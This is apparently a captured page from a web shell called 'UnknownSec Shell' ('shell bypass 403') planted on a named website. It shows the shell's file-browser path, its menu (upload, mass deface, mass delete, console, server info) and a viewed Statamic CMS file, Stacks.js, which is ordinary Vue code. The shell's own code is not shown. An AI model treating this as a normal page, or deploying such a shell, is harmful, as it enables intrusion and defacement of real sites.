shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
resources
/
js
/
components
/
stacks
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Stacks.js
import Vue from 'vue' import uniqid from 'uniqid' class Stacks { constructor(instance) { this.portals = instance.$root.portals; } count() { return this.stacks().length; } add(vm) { return vm.$portals.create('stack', { type: 'stack', depth: this.count() + 1, vm }); } stacks() { return this.portals.filter(portal => portal.data?.type === 'stack'); } } Object.defineProperties(Vue.prototype, { $stacks: { get() { return new Stacks(this); } } });
© 2026 UnknownSec